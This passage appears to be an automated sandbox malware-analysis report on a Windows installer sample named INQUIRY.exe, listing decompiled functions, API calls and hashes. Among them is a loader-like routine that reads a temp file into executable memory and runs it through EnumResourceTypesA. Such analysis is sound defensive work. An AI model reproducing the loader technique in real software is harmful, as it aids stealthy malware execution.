                          0x728b10b5
                          0x728b10be
                          0x728b10c7
                          0x728b10cd
                          0x728b10dd
                          0x728b10ee
                          0x728b110f
                          0x728b1115
                          0x728b1124
                          0x728b1134
                          0x728b113a
                          0x728b1143
                          0x728b114f
                          0x728b1155
                          0x728b1167
                          0x728b1185
                          0x728b119c
                          0x728b11b0
                          0x728b11c7
                          0x728b11db
                          0x728b11ee
                          0x728b1201
                          0x728b1218
                          0x728b122b
                          0x728b1242
                          0x728b1255
                          0x728b1268
                          0x728b127f
                          0x728b1293
                          0x728b12a6
                          0x728b1161
                          0x728b1164
                          0x728b1164
                          0x728b12af
                          0x728b12b5
                          0x728b12c0
                          0x728b12d1
                          0x728b12d3
                          0x728b12d8
                          0x728b12d9
                          0x728b12d9
                          0x728b12fb

                          APIs
                          • GetTempPathW.KERNEL32(00000103,?), ref: 728B10DD
                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 728B110F
                          • GetFileSize.KERNEL32(?,00000000), ref: 728B111E
                          • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 728B1134
                          • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 728B114F
                          • EnumResourceTypesA.KERNEL32(00000000,?,00000000), ref: 728B12B5
                          Memory Dump Source
                          • Source File: 00000001.00000002.666344294.00000000728B1000.00000020.00020000.sdmp, Offset: 728B0000, based on PE: true
                          • Associated: 00000001.00000002.666312612.00000000728B0000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.666371250.00000000728B5000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_728b0000_INQUIRY.jbxd
                          Similarity
                          • API ID: File$AllocCreateEnumPathReadResourceSizeTempTypesVirtual
                          • String ID:
                          • API String ID: 3718768629-0
                          • Opcode ID: 9d5e9391495947a7a2baf081d467d2066a9cf7e9ff275f305bd11e29e7ad955d
                          • Instruction ID: 785a57d31c0dac994140d5cd600062f2d1c02fa16f51fe45d0163840fe52b830
                          • Opcode Fuzzy Hash: 9d5e9391495947a7a2baf081d467d2066a9cf7e9ff275f305bd11e29e7ad955d
                          • Instruction Fuzzy Hash: 48911035904148EFDB05CBA8C991BEDBBB2EF5A308F1840D8D641AB392C6766F54DB24
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 606 401f51-401f5d 607 401f63-401f79 call 4029e8 * 2 606->607 608 40200b-40200d 606->608 617 401f88-401f96 LoadLibraryExA 607->617 618 401f7b-401f86 GetModuleHandleA 607->618 610 402156-40215b call 401423 608->610 616 40287d-40288c 610->616 620 401f98-401fa6 GetProcAddress 617->620 621 402004-402006 617->621 618->617 618->620 623 401fe5-401fea call 404e23 620->623 624 401fa8-401fae 620->624 621->610 628 401fef-401ff2 623->628 626 401fb0-401fbc call 401423 624->626 627 401fc7-401fdb 624->627 626->628 634 401fbe-401fc5 626->634 635 401fde call 728b115e 627->635 636 401fde call 728b1070 627->636 628->616 631 401ff8-401fff FreeLibrary 628->631 630 401fe0-401fe3 630->628 631->616 634->628 635->630 636->630
                          C-Code - Quality: 57%
                          			E00401F51(void* __ebx, void* __eflags) {
                          				struct HINSTANCE__* _t18;
                          				struct HINSTANCE__* _t25;
                          				void* _t26;
                          				struct HINSTANCE__* _t29;
                          				CHAR* _t31;
                          				intOrPtr* _t32;
                          				void* _t33;
                          
                          				_t26 = __ebx;
                          				asm("sbb eax, 0x423f58");
                          				 *(_t33 - 4) = 1;
                          				if(__eflags < 0) {
                          					_push(0xffffffe7);
                          					L14:
                          					E00401423();
                          					L15:
                          					 *0x423f28 =  *0x423f28 +  *(_t33 - 4);
                          					return 0;
                          				}
                          				_t31 = E004029E8(0xfffffff0);
                          				 *(_t33 + 8) = E004029E8(1);
                          				if( *((intOrPtr*)(_t33 - 0x14)) == __ebx) {
                          					L3:
                          					_t18 = LoadLibraryExA(_t31, _t26, 8); // executed
                          					_t29 = _t18;
                          					if(_t29 == _t26) {
                          						_push(0xfffffff6);
                          						goto L14;
                          					}
                          					L4:
                          					_t32 = GetProcAddress(_t29,  *(_t33 + 8));
                          					if(_t32 == _t26) {
                          						E00404E23(0xfffffff7,  *(_t33 + 8));
                          					} else {
                          						 *(_t33 - 4) = _t26;
                          						if( *((intOrPtr*)(_t33 - 0x1c)) == _t26) {
                          							 *_t32( *((intOrPtr*)(_t33 - 0x34)), 0x400, 0x424000, 0x40af68, " ?B"); // executed
                          						} else {
                          							E00401423( *((intOrPtr*)(_t33 - 0x1c)));
                          							if( *_t32() != 0) {
                          								 *(_t33 - 4) = 1;
                          							}
                          						}
                          					}
                          					if( *((intOrPtr*)(_t33 - 0x18)) == _t26) {
                          						FreeLibrary(_t29);
                          					}
                          					goto L15;
                          				}
                          				_t25 = GetModuleHandleA(_t31); // executed
                          				_t29 = _t25;
                          				if(_t29 != __ebx) {
                          					goto L4;
                          				}
                          				goto L3;
                          			}










                          0x00401f51
                          0x00401f51
                          0x00401f56
                          0x00401f5d
                          0x0040200b
                          0x00402156
                          0x00402156
                          0x0040287d
                          0x00402880
                          0x0040288c
                          0x0040288c
                          0x00401f6c
                          0x00401f76
                          0x00401f79
                          0x00401f88
                          0x00401f8c
                          0x00401f92
                          0x00401f96
                          0x00402004
                          0x00000000
                          0x00402004
                          0x00401f98
                          0x00401fa2
                          0x00401fa6
                          0x00401fea
                          0x00401fa8
                          0x00401fab
                          0x00401fae
                          0x00401fde
                          0x00401fb0
                          0x00401fb3
                          0x00401fbc
                          0x00401fbe
                          0x00401fbe
                          0x00401fbc
                          0x00401fae
                          0x00401ff2
                          0x00401ff9
                          0x00401ff9
                          0x00000000
                          0x00401ff2
                          0x00401f7c
                          0x00401f82
                          0x00401f86
                          0x00000000
                          0x00000000
                          0x00000000

                          APIs
                          • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401F7C
                            • Part of subcall function 00404E23: lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
                            • Part of subcall function 00404E23: lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
                            • Part of subcall function 00404E23: lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
                            • Part of subcall function 00404E23: SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
                            • Part of subcall function 00404E23: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EB7
                            • Part of subcall function 00404E23: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404ED1
                            • Part of subcall function 00404E23: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404EDF
                          • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401F8C
                          • GetProcAddress.KERNEL32(00000000,?), ref: 00401F9C
                          • FreeLibrary.KERNEL32(00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00401FF9
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd
                          Similarity
                          • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                          • String ID: ?B
                          • API String ID: 2987980305-117478770
                          • Opcode ID: 0013dd5c42a12ea961cdb4cd00b6dc1aa0902fbba5a2d5df2c5b14f7f9a972ce
                          • Instruction ID: 6286e611532d8822c51d7e946ff34bbadf458e6cc54079b264412ac530ebcb8a
                          • Opcode Fuzzy Hash: 0013dd5c42a12ea961cdb4cd00b6dc1aa0902fbba5a2d5df2c5b14f7f9a972ce
                          • Instruction Fuzzy Hash: 9611E772D04216EBCF107FA4DE89EAE75B0AB44359F20423BF611B62E0C77C8941DA5E
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 637 4015b3-4015c6 call 4029e8 call 40560c 642 4015c8-4015e3 call 4055a3 CreateDirectoryA 637->642 643 40160a-40160d 637->643 650 401600-401608 642->650 651 4015e5-4015f0 GetLastError 642->651 644 40162d-40215b call 401423 643->644 645 40160f-401628 call 401423 call 405a85 SetCurrentDirectoryA 643->645 659 40287d-40288c 644->659 645->659 650->642 650->643 654 4015f2-4015fb GetFileAttributesA 651->654 655 4015fd 651->655 654->650 654->655 655->650
                          C-Code - Quality: 85%
                          			E004015B3(struct _SECURITY_ATTRIBUTES* __ebx) {
                          				struct _SECURITY_ATTRIBUTES** _t10;
                          				int _t19;
                          				struct _SECURITY_ATTRIBUTES* _t20;
                          				signed char _t22;
                          				struct _SECURITY_ATTRIBUTES* _t23;
                          				CHAR* _t25;
                          				struct _SECURITY_ATTRIBUTES** _t29;
                          				void* _t30;
                          
                          				_t23 = __ebx;
                          				_t25 = E004029E8(0xfffffff0);
                          				_t10 = E0040560C(_t25);
                          				_t27 = _t10;
                          				if(_t10 != __ebx) {
                          					do {
                          						_t29 = E004055A3(_t27, 0x5c);
                          						 *_t29 = _t23;
                          						 *((char*)(_t30 + 0xb)) =  *_t29;
                          						_t19 = CreateDirectoryA(_t25, _t23); // executed
                          						if(_t19 == 0) {
                          							if(GetLastError() != 0xb7) {
                          								L4:
                          								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
                          							} else {
                          								_t22 = GetFileAttributesA(_t25); // executed
                          								if((_t22 & 0x00000010) == 0) {
                          									goto L4;
                          								}
                          							}
                          						}
                          						_t20 =  *((intOrPtr*)(_t30 + 0xb));
                          						 *_t29 = _t20;
                          						_t27 =  &(_t29[0]);
                          					} while (_t20 != _t23);
                          				}
                          				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
                          					_push(0xfffffff5);
                          					E00401423();
                          				} else {
                          					E00401423(0xffffffe6);
                          					E00405A85("C:\\Users\\jones\\AppData\\Local\\Temp", _t25);
                          					SetCurrentDirectoryA(_t25); // executed
                          				}
                          				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t30 - 4));
                          				return 0;
                          			}











                          0x004015b3
                          0x004015ba
                          0x004015bd
                          0x004015c2
                          0x004015c6
                          0x004015c8
                          0x004015d0
                          0x004015d6
                          0x004015d8
                          0x004015db
                          0x004015e3
                          0x004015f0
                          0x004015fd
                          0x004015fd
                          0x004015f2
                          0x004015f3
                          0x004015fb
                          0x00000000
                          0x00000000
                          0x004015fb
                          0x004015f0
                          0x00401600
                          0x00401603
                          0x00401605
                          0x00401606
                          0x004015c8
                          0x0040160d
                          0x0040162d
                          0x00402156
                          0x0040160f
                          0x00401611
                          0x0040161c
                          0x00401622
                          0x00401622
                          0x00402880
                          0x0040288c

                          APIs
                            • Part of subcall function 0040560C: CharNextA.USER32(004053BE,?,004218A0,00000000,00405670,004218A0,004218A0,?,?,73BCF560,004053BE,?,"C:\Users\user\Desktop\INQUIRY.exe" ,73BCF560), ref: 0040561A
                            • Part of subcall function 0040560C: CharNextA.USER32(00000000), ref: 0040561F
                            • Part of subcall function 0040560C: CharNextA.USER32(00000000), ref: 0040562E
                          • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                          • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                          • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                          • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401622
                          Strings
                          • C:\Users\user\AppData\Local\Temp, xrefs: 00401617
                          Memory Dump Source
                          • Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd
                          Similarity
                          • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                          • String ID: C:\Users\user\AppData\Local\Temp
                          • API String ID: 3751793516-47812868
                          • Opcode ID: b22028777b76ff0adb18f2892ab6001a383c6b987e8d30e1b3724520259a3699
                          • Instruction ID: 11ba4fe5436512bc7837d50811c3794abd92905400bb47a2e3f09ad75438aea6
                          • Opcode Fuzzy Hash: b22028777b76ff0adb18f2892ab6001a383c6b987e8d30e1b3724520259a3699
                          • Instruction Fuzzy Hash: B3010431908150AFDB116FB51D44D7F67B0AA56365768073BF491B22E2C63C4942D62E
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 662 40578b-405795 663 405796-4057c0 GetTickCount GetTempFileNameA 662->663 664 4057c2-4057c4 663->664 665 4057cf-4057d1 663->665 664->663 667 4057c6 664->667 666 4057c9-4057cc 665->666 667->666
                          C-Code - Quality: 100%
                          			E0040578B(char _a4, intOrPtr _a6, CHAR* _a8) {
                          				signed int _t11;
                          				int _t14;
                          				signed int _t16;
                          				void* _t19;
                          				CHAR* _t20;
                          
                          				_t20 = _a4;
                          				_t19 = 0x64;
                          				while(1) {
                          					_t19 = _t19 - 1;
                          					_a4 = 0x61736e;
                          					_t11 = GetTickCount();
                          					_t16 = 0x1a;
                          					_a6 = _a6 + _t11 % _t16;
                          					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
                          					if(_t14 != 0) {
                          						break;
                          					}
                          					if(_t19 != 0) {
                          						continue;
                          					}
                          					 *_t20 =  *_t20 & 0x00000000;
                          					return _t14;
                          				}
                          				return _t20;
                          			}








                          0x0040578f
                          0x00405795
                          0x00405796
                          0x00405796
                          0x00405797
                          0x0040579e
                          0x004057a8
                          0x004057b5
                          0x004057b8
                          0x004057c0
                          0x00000000
                          0x00000000
                          0x004057c4
                          0x00000000
                          0x00000000
                          0x004057c6
                          0x00000000
                          0x004057c6
                          0x00000000

                          APIs
                          • GetTickCount.KERNEL32 ref: 0040579E
                          • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 004057B8
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd
                          Similarity
                          • API ID: CountFileNameTempTick
                          • String ID: "C:\Users\user\Desktop\INQUIRY.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                          • API String ID: 1716503409-3200566217
                          • Opcode ID: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                          • Instruction ID: 4fcdc00fff711095840056c8ed2a58f2bfde19b521d5dac465ae6a1bf3f6778c
                          • Opcode Fuzzy Hash: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                          • Instruction Fuzzy Hash: F9F0A736348304B6D7104E55DC04B9B7F69DF91750F14C02BFA449B1C0D6B0995497A5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          APIs
                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 021A0AD8
                          Memory Dump Source
                          • Source File: 00000001.00000002.665372685.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_21a0000_INQUIRY.jbxd
                          Similarity
                          • API ID: CreateFile
                          • String ID:
                          • API String ID: 823142352-0
                          • Opcode ID: d3088c2b553b1c4b03664f18ea66a4f6c6281dc035037ce828c8aac50ed8e7d0
                          • Instruction ID: 3db85271c05ef2f05ebaa9f87ae698ae7aecd1e67eb5093be8b6d6588eb38f34
                          • Opcode Fuzzy Hash: d3088c2b553b1c4b03664f18ea66a4f6c6281dc035037ce828c8aac50ed8e7d0
                          • Instruction Fuzzy Hash: 72B1F029E50358ADDB60DBE4ED21BBDB7B5AF48B10F20545BE518EE2E0E7710E80DB05
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 84%
                          			E004031F1(void* __eflags) {
                          				void* _t2;
                          				void* _t5;
                          				CHAR* _t6;
                          
                          				_t6 = "C:\\Users\\jones\\AppData\\Local\\Temp\\";
                          				E00405CE3(_t6);
                          				_t2 = E004055E5(_t6);
                          				if(_t2 != 0) {
                          					E00405578(_t6);
                          					CreateDirectoryA(_t6, 0); // executed
                          					_t5 = E0040578B("1033", _t6); // executed
                          					return _t5;
                          				} else {
                          					return _t2;
                          				}
                          			}






                          0x004031f2
                          0x004031f8
                          0x004031fe
                          0x00403205
                          0x0040320a
                          0x00403212
                          0x0040321e
                          0x00403224
                          0x00403208
                          0x00403208
                          0x00403208

                          APIs
                            • Part of subcall function 00405CE3: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\INQUIRY.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D3B
                            • Part of subcall function 00405CE3: CharNextA.USER32(?,?,?,00000000), ref: 00405D48
                            • Part of subcall function 00405CE3: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\INQUIRY.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D4D
                            • Part of subcall function 00405CE3: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\INQUIRY.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D5D
                          • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00403212
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd
                          Similarity
                          • API ID: Char$Next$CreateDirectoryPrev
                          • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                          • API String ID: 4115351271-517883005
                          • Opcode ID: 048fde499a06d2c9d784819047d513c4ac368109c0a7a4f8390a920d62fbeaed
                          • Instruction ID: 52f5018bb87fe832e559484150a565c10a299960058697363e648776ae6da385
                          • Opcode Fuzzy Hash: 048fde499a06d2c9d784819047d513c4ac368109c0a7a4f8390a920d62fbeaed
                          • Instruction Fuzzy Hash: 68D0C92164AD3036D551372A3D0AFDF090D9F4272EF21417BF804B50CA5B6C6A8319EF
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 99%
                          			E00406481() {
                          				signed int _t530;
                          				void _t537;
                          				signed int _t538;
                          				signed int _t539;
                          				unsigned short _t569;
                          				signed int _t579;
                          				signed int _t607;
                          				void* _t627;
                          				signed int _t628;
                          				signed int _t635;
                          				signed int* _t643;
                          				void* _t644;
                          
                          				L0:
                          				while(1) {
                          					L0:
                          					_t530 =  *(_t644 - 0x30);
                          					if(_t530 >= 4) {
                          					}
                          					 *(_t644 - 0x40) = 6;
                          					 *(_t644 - 0x7c) = 0x19;
                          					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
                          					while(1) {
                          						L145:
                          						 *(_t644 - 0x50) = 1;
                          						 *(_t644 - 0x48) =  *(_t644 - 0x40);
                          						while(1) {
                          							L149:
                          							if( *(_t644 - 0x48) <= 0) {
                          								goto L155;
                          							}
                          							L150:
                          							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
                          							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
                          							 *(_t644 - 0x54) = _t643;
                          							_t569 =  *_t643;
                          							_t635 = _t569 & 0x0000ffff;
                          							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
                          							if( *(_t644 - 0xc) >= _t607) {
                          								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
                          								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
                          								_t628 = _t627 + 1;
                          								 *_t643 = _t569 - (_t569 >> 5);
                          								 *(_t644 - 0x50) = _t628;
                          							} else {
                          								 *(_t644 - 0x10) = _t607;
                          								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
                          								 *_t643 = (0x800 - _t635 >> 5) + _t569;
                          							}
                          							if( *(_t644 - 0x10) >= 0x1000000) {
                          								L148:
                          								_t487 = _t644 - 0x48;
                          								 *_t487 =  *(_t644 - 0x48) - 1;
                          								L149:
                          								if( *(_t644 - 0x48) <= 0) {
                          									goto L155;
                          								}
                          								goto L150;
                          							} else {
                          								L154:
                          								L146:
                          								if( *(_t644 - 0x6c) == 0) {
                          									L169:
                          									 *(_t644 - 0x88) = 0x18;
                          									L170:
                          									_t579 = 0x22;
                          									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
                          									_t539 = 0;
                          									L172:
                          									return _t539;
                          								}
                          								L147:
                          								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                          								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                          								_t484 = _t644 - 0x70;
                          								 *_t484 =  &(( *(_t644 - 0x70))[1]);
                          								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                          								goto L148;
                          							}
                          							L155:
                          							_t537 =  *(_t644 - 0x7c);
                          							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
                          							while(1) {
                          								L140:
                          								 *(_t644 - 0x88) = _t537;
                          								while(1) {
                          									L1:
                          									_t538 =  *(_t644 - 0x88);
                          									if(_t538 > 0x1c) {
                          										break;
                          									}
                          									L2:
                          									switch( *((intOrPtr*)(_t538 * 4 +  &M004068EF))) {
                          										case 0:
                          											L3:
                          											if( *(_t644 - 0x6c) == 0) {
                          												goto L170;
                          											}
                          											L4:
                          											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                          											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                          											_t538 =  *( *(_t644 - 0x70));
                          											if(_t538 > 0xe1) {
                          												goto L171;
                          											}
                          											L5:
                          											_t542 = _t538 & 0x000000ff;
                          											_push(0x2d);
                          											asm("cdq");
                          											_pop(_t581);
                          											_push(9);
                          											_pop(_t582);
                          											_t638 = _t542 / _t581;
                          											_t544 = _t542 % _t581 & 0x000000ff;
                          											asm("cdq");
                          											_t633 = _t544 % _t582 & 0x000000ff;
                          											 *(_t644 - 0x3c) = _t633;
                          											 *(_t644 - 0x1c) = (1 << _t638) - 1;
                          											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
                          											_t641 = (0x300 << _t633 + _t638) + 0x736;
                          											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
                          												L10:
                          												if(_t641 == 0) {
                          													L12:
                          													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
                          													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                          													goto L15;
                          												} else {
                          													goto L11;
                          												}
                          												do {
                          													L11:
                          													_t641 = _t641 - 1;
                          													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
                          												} while (_t641 != 0);
                          												goto L12;
                          											}
                          											L6:
                          											if( *(_t644 - 4) != 0) {
                          												GlobalFree( *(_t644 - 4));
                          											}
                          											_t538 = GlobalAlloc(0x40, 0x600); // executed
                          											 *(_t644 - 4) = _t538;
                          											if(_t538 == 0) {
                          												goto L171;
                          											} else {
                          												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
                          												goto L10;
                          											}
                          										case 1:
                          											L13:
                          											__eflags =  *(_t644 - 0x6c);
                          											if( *(_t644 - 0x6c) == 0) {
                          												L157:
                          												 *(_t644 - 0x88) = 1;
                          												goto L170;
                          											}
                          											L14:
                          											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                          											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
                          											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                          											_t45 = _t644 - 0x48;
                          											 *_t45 =  *(_t644 - 0x48) + 1;
                          											__eflags =  *_t45;
                          											L15:
                          											if( *(_t644 - 0x48) < 4) {
                          												goto L13;
                          											}
                          											L16:
                          											_t550 =  *(_t644 - 0x40);
                          											if(_t550 ==  *(_t644 - 0x74)) {
                          												L20:
                          												 *(_t644 - 0x48) = 5;
                          												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
                          												goto L23;
                          											}
                          											L17:
                          											 *(_t644 - 0x74) = _t550;
                          											if( *(_t644 - 8) != 0) {
                          												GlobalFree( *(_t644 - 8));
                          											}
                          											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
                          											 *(_t644 - 8) = _t538;
                          											if(_t538 == 0) {
                          												goto L171;
                          											} else {
                          												goto L20;
                          											}
                          										case 2:
                          											L24:
                          											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
                          											 *(_t644 - 0x84) = 6;
                          											 *(_t644 - 0x4c) = _t557;
                          											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
                          											goto L132;
                          										case 3:
                          											L21:
                          											__eflags =  *(_t644 - 0x6c);
                          											if( *(_t644 - 0x6c) == 0) {
                          												L158:
                          												 *(_t644 - 0x88) = 3;
                          												goto L170;
                          											}
                          											L22:
                          											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                          											_t67 = _t644 - 0x70;
                          											 *_t67 =  &(( *(_t644 - 0x70))[1]);
                          											__eflags =  *_t67;
                          											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                          											L23:
                          											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
                          											if( *(_t644 - 0x48) != 0) {
                          												goto L21;
                          											}
                          											goto L24;
                          										case 4:
                          											L133:
                          											_t559 =  *_t642;
                          											_t626 = _t559 & 0x0000ffff;
                          											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
                          											if( *(_t644 - 0xc) >= _t596) {
                          												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
                          												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
                          												 *(_t644 - 0x40) = 1;
                          												_t560 = _t559 - (_t559 >> 5);
                          												__eflags = _t560;
                          												 *_t642 = _t560;
                          											} else {
                          												 *(_t644 - 0x10) = _t596;
                          												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                          												 *_t642 = (0x800 - _t626 >> 5) + _t559;
                          											}
                          											if( *(_t644 - 0x10) >= 0x1000000) {
                          												goto L139;
                          											} else {
                          												goto L137;
                          											}
                          										case 5:
                          											L137:
                          											if( *(_t644 - 0x6c) == 0) {
                          												L168:
                          												 *(_t644 - 0x88) = 5;
                          												goto L170;
                          											}
                          											L138:
